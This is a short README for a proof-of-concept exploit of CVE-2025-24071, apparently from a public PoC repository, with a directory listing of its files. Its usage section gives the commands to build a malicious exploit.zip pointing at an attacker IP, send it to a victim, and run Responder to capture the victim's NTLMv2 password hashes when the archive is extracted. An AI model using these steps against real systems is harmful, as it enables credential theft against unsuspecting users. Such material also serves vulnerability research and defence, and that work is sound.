A PoC of CVE-2025-24071, A windows vulnerability that allow get NTMLv2 hashes# CVE-2025-24071_PoC
## Usage
- Execute the script
```bash
python PoC.py test 192.168.1.45
```

- Send "exploit.zip" to the target, and then you can use [Responder](https://github.com/SpiderLabs/Responder) in order to recive the NTLMv2 hash
```bash
sudo python3 responder.py -I ens33
```

- Now when the target extract the file `.zip`, Boom! we get the NTLM hashes

[4.0K] /data/pocs/9e2871e598048012d4f1b7cc4f03b5ee5948013c
├── [2.3K] PoC.py
├── [ 586] README.md
└── [2.2M] usecase.gif
0 directories, 3 files